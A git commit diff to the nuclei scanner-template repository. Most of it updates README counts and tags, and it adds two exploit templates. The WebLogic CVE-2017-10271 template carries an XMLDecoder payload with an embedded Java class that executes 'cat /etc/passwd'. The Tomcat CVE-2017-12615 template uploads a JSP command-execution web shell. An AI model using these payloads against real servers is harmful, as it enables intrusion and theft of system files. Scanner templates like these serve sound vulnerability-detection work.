commit
810054af71
|
@ -12,10 +12,6 @@
|
|||
# More details - https://github.com/projectdiscovery/nuclei#using-nuclei-ignore-file-for-template-exclusion
|
||||
|
||||
.pre-commit-config.yaml
|
||||
cves/2013/CVE-2013-2251.yaml
|
||||
cves/2017/CVE-2017-7529.yaml
|
||||
cves/2020/CVE-2020-13379.yaml
|
||||
cves/2020/CVE-2020-16139.yaml
|
||||
|
||||
# Fuzzing is excluded to avoid running bruteforce on every server as default.
|
||||
fuzzing/
|
||||
|
|
40
README.md
40
README.md
|
@ -28,13 +28,13 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
|
||||
| Templates | Counts | Templates | Counts |
|
||||
| --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
||||
| cves | 165 | default-logins | 8 |
|
||||
| cves | 176 | default-logins | 8 |
|
||||
| dns | 6 | exposed-panels | 74 |
|
||||
| exposed-tokens | 9 | exposures | 41 |
|
||||
| exposed-tokens | 9 | exposures | 44 |
|
||||
| fuzzing | 4 | helpers | 2 |
|
||||
| miscellaneous | 12 | misconfiguration | 39 |
|
||||
| takeovers | 1 | technologies | 46 |
|
||||
| vulnerabilities | 75 | workflows | 17 |
|
||||
| miscellaneous | 12 | misconfiguration | 40 |
|
||||
| takeovers | 1 | technologies | 45 |
|
||||
| vulnerabilities | 81 | workflows | 18 |
|
||||
|
||||
|
||||
**Tree structure of nuclei templates:**
|
||||
|
@ -57,7 +57,9 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
│ │ └── CVE-2014-6271.yaml
|
||||
│ ├── 2017
|
||||
│ │ ├── CVE-2017-10075.yaml
|
||||
│ │ ├── CVE-2017-10271.yaml
|
||||
│ │ ├── CVE-2017-11444.yaml
|
||||
│ │ ├── CVE-2017-12615.yaml
|
||||
│ │ ├── CVE-2017-12637.yaml
|
||||
│ │ ├── CVE-2017-14537.yaml
|
||||
│ │ ├── CVE-2017-14849.yaml
|
||||
|
@ -86,6 +88,7 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
│ │ ├── CVE-2018-19439.yaml
|
||||
│ │ ├── CVE-2018-20824.yaml
|
||||
│ │ ├── CVE-2018-2791.yaml
|
||||
│ │ ├── CVE-2018-3167.yaml
|
||||
│ │ ├── CVE-2018-3714.yaml
|
||||
│ │ ├── CVE-2018-3760.yaml
|
||||
│ │ ├── CVE-2018-5230.yaml
|
||||
|
@ -116,7 +119,6 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
│ │ ├── CVE-2019-16278.yaml
|
||||
│ │ ├── CVE-2019-1653.yaml
|
||||
│ │ ├── CVE-2019-16662.yaml
|
||||
│ │ ├── CVE-2019-16759-1.yaml
|
||||
│ │ ├── CVE-2019-16759.yaml
|
||||
│ │ ├── CVE-2019-16920.yaml
|
||||
│ │ ├── CVE-2019-17382.yaml
|
||||
|
@ -133,6 +135,7 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
│ │ ├── CVE-2019-3396.yaml
|
||||
│ │ ├── CVE-2019-3402.yaml
|
||||
│ │ ├── CVE-2019-3799.yaml
|
||||
│ │ ├── CVE-2019-5127.yaml
|
||||
│ │ ├── CVE-2019-5418.yaml
|
||||
│ │ ├── CVE-2019-6112.yaml
|
||||
│ │ ├── CVE-2019-6340.yaml
|
||||
|
@ -145,6 +148,7 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
│ │ ├── CVE-2019-8451.yaml
|
||||
│ │ ├── CVE-2019-8903.yaml
|
||||
│ │ ├── CVE-2019-8982.yaml
|
||||
│ │ ├── CVE-2019-9041.yaml
|
||||
│ │ ├── CVE-2019-9670.yaml
|
||||
│ │ ├── CVE-2019-9733.yaml
|
||||
│ │ ├── CVE-2019-9955.yaml
|
||||
|
@ -163,10 +167,12 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
│ │ ├── CVE-2020-13942.yaml
|
||||
│ │ ├── CVE-2020-14179.yaml
|
||||
│ │ ├── CVE-2020-14181.yaml
|
||||
│ │ ├── CVE-2020-14815.yaml
|
||||
│ │ ├── CVE-2020-14864.yaml
|
||||
│ │ ├── CVE-2020-14882.yaml
|
||||
│ │ ├── CVE-2020-15129.yaml
|
||||
│ │ ├── CVE-2020-15505.yaml
|
||||
│ │ ├── CVE-2020-15568.yaml
|
||||
│ │ ├── CVE-2020-15920.yaml
|
||||
│ │ ├── CVE-2020-16846.yaml
|
||||
│ │ ├── CVE-2020-16952.yaml
|
||||
|
@ -182,6 +188,7 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
│ │ ├── CVE-2020-24223.yaml
|
||||
│ │ ├── CVE-2020-24312.yaml
|
||||
│ │ ├── CVE-2020-24579.yaml
|
||||
│ │ ├── CVE-2020-25213.yaml
|
||||
│ │ ├── CVE-2020-2551.yaml
|
||||
│ │ ├── CVE-2020-25540.yaml
|
||||
│ │ ├── CVE-2020-26214.yaml
|
||||
|
@ -218,8 +225,12 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
│ │ ├── CVE-2020-9496.yaml
|
||||
│ │ └── CVE-2020-9757.yaml
|
||||
│ └── 2021
|
||||
│ ├── CVE-2021-22122.yaml
|
||||
│ ├── CVE-2021-22873.yaml
|
||||
│ ├── CVE-2021-25646.yaml
|
||||
│ ├── CVE-2021-26710.yaml
|
||||
│ ├── CVE-2021-26722.yaml
|
||||
│ ├── CVE-2021-26723.yaml
|
||||
│ └── CVE-2021-3019.yaml
|
||||
├── default-logins
|
||||
│ ├── activemq
|
||||
|
@ -349,6 +360,7 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
│ │ ├── amazon-docker-config-disclosure.yaml
|
||||
│ │ ├── ansible-config-disclosure.yaml
|
||||
│ │ ├── composer-config.yaml
|
||||
│ │ ├── docker-compose-config.yml
|
||||
│ │ ├── exposed-svn.yaml
|
||||
│ │ ├── git-config-nginxoffbyslash.yaml
|
||||
│ │ ├── git-config.yaml
|
||||
|
@ -373,6 +385,8 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
│ │ ├── ds_store.yaml
|
||||
│ │ ├── exposed-alps-spring.yaml
|
||||
│ │ ├── filezilla.yaml
|
||||
│ │ ├── golang-metrics.yaml
|
||||
│ │ ├── keycloak-json.yaml
|
||||
│ │ ├── lazy-file.yaml
|
||||
│ │ ├── server-private-keys.yaml
|
||||
│ │ └── xprober-service.yaml
|
||||
|
@ -429,12 +443,13 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
│ ├── larvel-debug.yaml
|
||||
│ ├── linkerd-ssrf-detect.yaml
|
||||
│ ├── manage-engine-ad-search.yaml
|
||||
│ ├── misconfigured-docker.yaml
|
||||
│ ├── nginx-status.yaml
|
||||
│ ├── php-errors.yaml
|
||||
│ ├── php-fpm-status.yaml
|
||||
│ ├── put-method-enabled.yaml
|
||||
│ ├── rack-mini-profiler.yaml
|
||||
│ ├── salesforce-aura-misconfig.yaml
|
||||
│ ├── salesforce-aura.yaml
|
||||
│ ├── server-status-localhost.yaml
|
||||
│ ├── shell-history.yaml
|
||||
│ ├── sidekiq-dashboard.yaml
|
||||
|
@ -460,7 +475,6 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
│ ├── bigip-config-utility-detect.yaml
|
||||
│ ├── cacti-detect.yaml
|
||||
│ ├── clockwork-php-page.yaml
|
||||
│ ├── couchdb-detect.yaml
|
||||
│ ├── detect-springboot-actuator.yaml
|
||||
│ ├── favicon-detection.yaml
|
||||
│ ├── firebase-detect.yaml
|
||||
|
@ -516,9 +530,12 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
│ │ └── unauthenticated-jenkin-dashboard.yaml
|
||||
│ ├── jira
|
||||
│ │ ├── jira-service-desk-signup.yaml
|
||||
│ │ ├── jira-unauthenticated-adminprojects.yaml
|
||||
│ │ ├── jira-unauthenticated-dashboards.yaml
|
||||
│ │ ├── jira-unauthenticated-popular-filters.yaml
|
||||
│ │ ├── jira-unauthenticated-projectcategories.yaml
|
||||
│ │ ├── jira-unauthenticated-projects.yaml
|
||||
│ │ ├── jira-unauthenticated-resolutions.yaml
|
||||
│ │ └── jira-unauthenticated-user-picker.yaml
|
||||
│ ├── moodle
|
||||
│ │ ├── moodle-filter-jmol-lfi.yaml
|
||||
|
@ -528,6 +545,7 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
│ ├── other
|
||||
│ │ ├── CNVD-2020-62422.yaml
|
||||
│ │ ├── acme-xss.yaml
|
||||
│ │ ├── apache-flink-unauth-rce.yaml
|
||||
│ │ ├── aspnuke-openredirect.yaml
|
||||
│ │ ├── bullwark-momentum-lfi.yaml
|
||||
│ │ ├── cached-aem-pages.yaml
|
||||
|
@ -562,6 +580,9 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
│ ├── springboot
|
||||
│ │ ├── springboot-actuators-jolokia-xxe.yaml
|
||||
│ │ └── springboot-h2-db-rce.yaml
|
||||
│ ├── thinkcmf
|
||||
│ │ ├── thinkcmf-lfi.yaml
|
||||
│ │ └── thinkcmf-rce.yaml
|
||||
│ ├── thinkphp
|
||||
│ │ ├── thinkphp-2-rce.yaml
|
||||
│ │ ├── thinkphp-5022-rce.yaml
|
||||
|
@ -605,12 +626,13 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
├── springboot-workflow.yaml
|
||||
├── thinkphp-workflow.yaml
|
||||
├── vbulletin-workflow.yaml
|
||||
├── weblogic-workflow.yaml
|
||||
└── wordpress-workflow.yaml
|
||||
```
|
||||
|
||||
</details>
|
||||
|
||||
**55 directories, 508 files**.
|
||||
**56 directories, 529 files**.
|
||||
|
||||
📖 Documentation
|
||||
-----
|
||||
|
|
|
@ -3,6 +3,7 @@ info:
|
|||
name: CVE-2005-2428
|
||||
author: CasperGN
|
||||
severity: medium
|
||||
tags: cve,cve2005
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: AppServ Open Project 2.5.10 and earlier XSS
|
||||
author: unstabl3
|
||||
severity: medium
|
||||
tags: cve,cve2008,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -5,6 +5,7 @@ info:
|
|||
author: exploitation & @dwisiswant0
|
||||
severity: critical
|
||||
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
|
||||
tags: cve,cve2013,rce
|
||||
|
||||
requests:
|
||||
- payloads:
|
||||
|
|
|
@ -5,6 +5,7 @@ info:
|
|||
author: pentest_swissky
|
||||
severity: high
|
||||
description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications
|
||||
tags: cve,cve2014,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -5,6 +5,7 @@ info:
|
|||
author: madrobot
|
||||
severity: medium
|
||||
description: The vulnerability can be used to include HTML or JavaScript code to the affected web page. The code is executed in the browser of users if they visit the manipulated site.
|
||||
tags: cve,cve2017,xss,oracle
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -0,0 +1,67 @@
|
|||
id: CVE-2017-10271
|
||||
|
||||
info:
|
||||
name: CVE-2017-10271
|
||||
author: dr_set
|
||||
severity: high
|
||||
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
|
||||
reference: https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
|
||||
tags: cve,cve2017,rce,oracle,weblogic
|
||||
|
||||
# Source:- https://github.com/SuperHacker-liuan/cve-2017-10271-poc
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wls-wsat/CoordinatorPortType HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||
Connection: close
|
||||
Content-Type: text/xml
|
||||
Content-Length: 5178
|
||||
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
|
||||
<soapenv:Header>
|
||||
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
|
||||
<java>
|
||||
<void class="weblogic.utils.Hex" method="fromHexString" id="cls">
|
||||
<string>0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034</string>
|
||||
</void>
|
||||
<void class="org.mozilla.classfile.DefiningClassLoader">
|
||||
<void method="defineClass">
|
||||
<string>com.supeream.exploits.XmlExp</string>
|
||||
<object idref="cls"></object>
|
||||
<void method="newInstance">
|
||||
<void method="say" id="proc">
|
||||
<string>cat /etc/passwd</string>
|
||||
</void>
|
||||
</void>
|
||||
</void>
|
||||
</void>
|
||||
<void class="java.lang.Thread" method="currentThread">
|
||||
<void method="getCurrentWork">
|
||||
<void method="getResponse">
|
||||
<void method="getServletOutputStream">
|
||||
<void method="writeStream">
|
||||
<object idref="proc"></object>
|
||||
</void>
|
||||
<void method="flush"/>
|
||||
</void>
|
||||
<void method="getWriter"><void method="write"><string></string></void></void>
|
||||
</void>
|
||||
</void>
|
||||
</void>
|
||||
</java>
|
||||
</work:WorkContext>
|
||||
</soapenv:Header>
|
||||
<soapenv:Body/>
|
||||
</soapenv:Envelope>
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- 'root:[x*]:0:0'
|
||||
part: body
|
|
@ -5,6 +5,7 @@ info:
|
|||
author: dwisiswant0
|
||||
severity: high
|
||||
description: Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array.
|
||||
tags: cve,cve2017,sqli,subrion
|
||||
|
||||
# Source:
|
||||
# - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q
|
||||
|
|
|
@ -0,0 +1,50 @@
|
|||
id: CVE-2017-12615
|
||||
|
||||
info:
|
||||
name: Apache Tomcat RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
tags: cve,cve2017,apache,rce
|
||||
reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
|
||||
description: |
|
||||
By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
|
||||
This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
|
||||
However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
|
||||
Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
|
||||
|
||||
requests:
|
||||
- method: PUT
|
||||
path:
|
||||
- "{{BaseURL}}/poc.jsp/"
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: |
|
||||
<%@ page import="java.util.*,java.io.*"%>
|
||||
<%
|
||||
if (request.getParameter("cmd") != null) {
|
||||
out.println("Command: " + request.getParameter("cmd") + "<BR>");
|
||||
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
|
||||
OutputStream os = p.getOutputStream();
|
||||
InputStream in = p.getInputStream();
|
||||
DataInputStream dis = new DataInputStream(in);
|
||||
String disr = dis.readLine();
|
||||
while ( disr != null ) {
|
||||
out.println(disr);
|
||||
disr = dis.readLine();
|
||||
}
|
||||
}
|
||||
%>
|
||||
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -5,6 +5,7 @@ info:
|
|||
author: apt-mirror
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
|
||||
tags: cve,cve2017,sap,traversal
|
||||
|
||||
# References:
|
||||
# - [1] https://www.cvedetails.com/cve/CVE-2017-12637/
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: trixbox 2.8.0 - directory-traversal
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
tags: cve,cve2017,trixbox,traversal
|
||||
|
||||
# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2017-14537
|
||||
# https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
|
||||
|
|
|
@ -5,6 +5,7 @@ info:
|
|||
author: Random-Robbie
|
||||
severity: high
|
||||
description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.
|
||||
tags: cve,cve2017,nodejs,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: "Struts2 RCE "
|
||||
severity: critical
|
||||
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||||
tags: cve,cve2017,struts,rce
|
||||
|
||||
# This template supports the detection part only.
|
||||
# Do not test any website without permission
|
||||
|
|
|
@ -5,6 +5,7 @@ info:
|
|||
author: pikpikcu
|
||||
severity: medium
|
||||
description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
|
||||
tags: cve,cve2017,magmi,xss
|
||||
|
||||
# Issues:-https://github.com/dweeves/magmi-git/issues/522
|
||||
# Download:-https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
|
||||
|
|
|
@ -5,7 +5,7 @@ info:
|
|||
author: bp0lr & dwisiswant0
|
||||
severity: high
|
||||
description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
|
||||
|
||||
tags: cve,cve2017,mantisbt
|
||||
|
||||
# THIS TEMPLATE IS ONLY FOR DETECTING
|
||||
# To carry out further attacks, please see reference[2] below.
|
||||
|
|
|
@ -5,6 +5,7 @@ info:
|
|||
author: pd-team
|
||||
severity: high
|
||||
description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
|
||||
tags: cve,cve2017,atlassian,jira,ssrf
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -5,6 +5,8 @@ info:
|
|||
author: Random-Robbie
|
||||
severity: high
|
||||
description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI
|
||||
tags: cve,cve2017,php,phpunit,rce
|
||||
|
||||
# Reference to exploit
|
||||
# https://github.com/cyberharsh/Php-unit-CVE-2017-9841
|
||||
# https://github.com/RandomRobbieBF/phpunit-brute
|
||||
|
|
|
@ -4,6 +4,8 @@ info:
|
|||
name: Cisco ASA path traversal vulnerability
|
||||
author: organiccrap
|
||||
severity: medium
|
||||
tags: cve,cve2018,cisco,traversal
|
||||
|
||||
# https://github.com/yassineaboukir/CVE-2018-0296
|
||||
# curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
|
||||
# if vulnerable, curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/number
|
||||
|
|
|
@ -5,6 +5,7 @@ info:
|
|||
author: mavericknerd @0h1in9e
|
||||
severity: high
|
||||
description: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser.
|
||||
tags: cve,cve2018,jolokia,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,8 +4,8 @@ info:
|
|||
name: Splunk Sensitive Information Disclosure
|
||||
author: Harsh Bothra
|
||||
severity: medium
|
||||
|
||||
# source:- https://nvd.nist.gov/vuln/detail/CVE-2018-11409
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409
|
||||
tags: cve,cve2018,splunk
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,8 +4,8 @@ info:
|
|||
name: Apache Tomcat JK Status Manager Access
|
||||
author: Harsh Bothra
|
||||
severity: medium
|
||||
|
||||
# Source:- https://github.com/immunIT/CVE-2018-11759
|
||||
reference: https://github.com/immunIT/CVE-2018-11759
|
||||
tags: cve,cve2018,apache
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: RSA Authentication Manager XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
tags: cve,cve2018,xss,flash
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: Spring MVC Directory Traversal Vulnerability
|
||||
author: hetroublemakr
|
||||
severity: high
|
||||
# reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
|
||||
reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
|
||||
tags: cve,cve2018,spring,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -11,6 +11,8 @@ info:
|
|||
An unauthenticated remote malicious user (or attacker) can supply
|
||||
specially crafted request parameters against Spring Data REST backed HTTP resources
|
||||
or using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273
|
||||
tags: cve,cve2018,vmware,rce
|
||||
|
||||
requests:
|
||||
- payloads:
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: FortiOS - Credentials Disclosure
|
||||
author: organiccrap
|
||||
severity: high
|
||||
tags: cve,cve2018,fortios
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
|
||||
type: XSS
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
|
||||
tags: cve,cve2018,fortios,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Django Open Redirect
|
||||
author: pikpikcu
|
||||
severity: low
|
||||
tags: cve,cve2018,django,redirect
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Responsive filemanager 9.13.1 - SSRF/LFI
|
||||
author: madrobot
|
||||
severity: high
|
||||
tags: cve,cve2018,ssrf,lfi
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
|
|
|
@ -4,7 +4,9 @@ info:
|
|||
name: Nuxeo Authentication Bypass Remote Code Execution
|
||||
author: madrobot
|
||||
severity: high
|
||||
description: Nuxeo Authentication Bypass Remote Code Execution < 103 using a SSTI
|
||||
description: Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI
|
||||
tags: cve,cve2018,nuxeo,ssti,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: fuelCMS 1.4.1 - Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
tags: cve,cve2018,fuelcms,rce
|
||||
|
||||
# Vendor Homepage: https://www.getfuelcms.com/
|
||||
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
|
||||
|
|
|
@ -5,6 +5,7 @@ info:
|
|||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based)
|
||||
tags: cve,cve2018,comodo,rce
|
||||
|
||||
# References:
|
||||
# - https://www.exploit-db.com/exploits/48825
|
||||
|
|
|
@ -5,6 +5,7 @@ info:
|
|||
author: nadino
|
||||
severity: medium
|
||||
description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.
|
||||
tags: cve,cve2018,wordpress,xss
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
|
|
|
@ -4,8 +4,8 @@ info:
|
|||
name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
|
||||
# Refrence:-https://www.cvedetails.com/cve/CVE-2018-19386/
|
||||
refrence: https://www.cvedetails.com/cve/CVE-2018-19386/
|
||||
tags: cve,cve2018,solarwinds,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -5,6 +5,7 @@ info:
|
|||
author: madrobot & dwisiswant0
|
||||
severity: high
|
||||
description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
|
||||
tags: cve,cve2018,oracle,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -5,6 +5,7 @@ info:
|
|||
author: madrobot & dwisiswant0
|
||||
severity: medium
|
||||
description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter.
|
||||
tags: cve,cve2018,atlassian,jira,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -5,6 +5,8 @@ info:
|
|||
author: madrobot
|
||||
severity: medium
|
||||
